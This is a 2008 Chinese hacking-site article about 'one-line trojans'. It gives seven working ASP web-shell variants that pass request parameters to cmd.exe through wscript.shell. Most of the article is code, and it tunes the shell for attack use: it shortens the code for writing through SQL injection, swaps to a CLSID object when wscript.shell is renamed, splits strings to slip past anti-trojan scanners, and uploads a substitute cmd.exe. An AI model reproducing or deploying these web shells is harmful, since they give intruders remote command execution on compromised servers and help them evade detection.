奥运倒计时: 2008 中国挺住,中国加油! 全国人民对四川汶川大地震遇难同胞的深切哀悼! 设为首页 加入收藏
点击进入太平洋安全网首页
论坛登陆 用户名: 密码:
首页 新闻资讯 文章中心 黑客资源 黑客点睛 安全防护 软件下载 动画教程 商城中心 技术问答 论坛社区
文章 下载 图片
安全  
 您现在的位置: 太平洋安全网 >> 安全防护 >> 安全工具 >> 正文

关于一句话木马

作者:未知    安全防护来源:互联网    点击数:    更新时间:2008-5-8

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submIT value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.wrITe server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.wrITe server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.wrITe server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>


这里用了response.wrITe,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马软件检测出来怎么办?
把变量拆开呀。代码:


<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成


<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>


第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c
"&request("c")).stdout.readall%>

安全防护录入:二少    责任编辑:放弃 
  • 上一个安全防护:

  • 下一个安全防护:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     推荐文章
    固顶安全防护三年不重装 令Windows百毒不侵13妙招…
    推荐安全防护SQL Server SA权限总结经典技术…
    推荐安全防护关闭任务管理器杀不了的进程
    推荐安全防护关于一句话木马
    推荐安全防护远程控制新法宝——DMRC
    推荐安全防护深入剖析EFS文件加密系统
    推荐安全防护Hping--强大的TCP/IP工具
    推荐安全防护大狼狗加密专家详细使用评测
     热门文章
    固顶安全防护三年不重装 令Windows百毒不侵13妙招…
    普通安全防护Google搜索引擎的十大应用
    普通安全防护不登录编辑他人注册表的方法
    普通安全防护远程控制服务器的简捷方法
    普通安全防护经典黑客软件的使用方法
    普通安全防护利用google伪装你的木马地址
    普通安全防护几天之内做到排名第一大量使用作弊手段
    推荐安全防护大狼狗加密专家详细使用评测
     本站推荐

    关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 站长信箱 | 友情链接 | 网站地图
    24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
    客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
    Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
    许可证号:豫ICP备07005385号